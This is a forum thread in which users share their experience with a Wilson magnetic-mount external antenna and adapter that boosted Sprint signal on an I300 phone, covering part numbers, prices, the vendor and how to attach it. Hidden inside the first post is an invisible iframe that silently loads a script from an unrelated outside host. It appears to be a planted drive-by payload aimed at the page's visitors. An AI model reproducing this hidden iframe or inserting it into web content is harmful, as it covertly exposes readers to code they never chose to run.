+ Reply to Thread

Exclamation Finally! An external antenna that really works

They said it couldn't be done, but I have finally found an external antenna that really makes a difference. We have a cabin which is right on the outskirts of the Sprint coverage area--if I'm on the porch I can get one or zero bars of service, but it's really spotty--if I move around while on a call, I'll lose the call. Inside the cabin, no signal at all. It's even worse at work in my office where I get absolutely no signal at all unless I go into a conference room and stand by an external window.

I bought a kit from AlternativeWireless with a MicroMag antenna and adapter cable. It did nothing at all for me. I contacted them for an RMA and the person who helped me was very friendly and knowledgeable so I asked her for any advice. I told her that I had heard (here among other places) that external antennas don't work for Sprint PCS and she said that's a common fallacy. Long story short (if anyone wants more details, contact me offline) I bought a different kit from them which was pretty much the same price, but the antenna is a 3dB gain as opposed to the 0dB gain of the MicroMag. It arrived today and I'm sitting here looking at 4 bars of service in my office--from No Service to 4 bars!

We're going to the cabin tonight so I'll try this again up there but considering coverage was already worse here than there and I'm seeing this kind of improvement, I have no doubt that this will resolve my coverage issues at the cabin, as well.

So, if you're tired of weak, spotty coverage with Sprint, I can confidently recommend the Wilson Electronics antenna (W-301103) dual-band 800-1900 MHz and their external antenna adapter (359905). The website is at http://www.alternativewireless.com/ or you can call and ask for Lisa--you may want to mention that she helped Rick in Minnesota with the I300 kit. It was around $54 shipped for both the antenna and the adapter. The Wilson antenna wasn't on their website so calling may be better: 888-399-4932 or 210-493-0023.

No affiliation, just a satisfied customer.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

interesting info! id like to see a pic with all this stuff attached if you can swing one..

Just got home from our cabin (have a bachelor party to attend tonight) and it worked out great. I played around with a few mounting points and ended up putting the antenna on a metallic plant hanger. It provides a solid base for the antenna and it sticks out nicely from the wall of the house. I then fed the lead into the house through the same hole the TV antenna cable passes through.

Not only was I getting 5 bars of service, I was able to quickly establish a wireless internet connection (using Marctronixx' instructions, coincidentally) and surf with acceptable performance. We're heading back up there next weekend so I'll try to take some pictures. Basically, it's a magnetic-based antenna with a 10' lead, terminating in a TNC (I think it's called) connector. That's around $35. There's a TNC adapter that converts to the proper connection for the I300. That's around $15. The adapter screws onto the 10' coax from the antenna and then you pop out the rubber protector on the right side of the phone above the power button. The adapter cable plugs right into that. It takes about 30-45 seconds for something to happen (for the phone to recognize the external antenna is available?) and then signal strength picks up dramatically.

Disconnecting the antenna results in immediate signal loss. So, it takes a few seconds when you connect the lead but no time at all when you disconnect it.

Any other questions, let me know. I'll try to get pictures up next Sunday night.

Administrator

Arrow

thanks for the write up.. i can kinda see how it all works..

but how awkward is it to have the cable on the phone? do you have to stay basically in that one area or can you move around a little bit...?

If a larger more permanent install antenna is wanted..... this particular Wilson antenna gives you a 10-15db gain!

Granted the magnetic mount is more versatile but the 3db gain might not be enough for some folks in the fringe areas.

http://www.alternativewireless.com/c...r-antenna.html

Question for you, I'm really interested in this (sent you an email asking for info), but how(where) does the antena plug into the phone?

jlv
    On the side of the I300 near the antenna is a rubber plug covering up the jack for the external antenna.

I looked around on the website. No mention of an antennae for the I330. Has anyone seen a way to attach an external db gain antennae for the I330?

Brian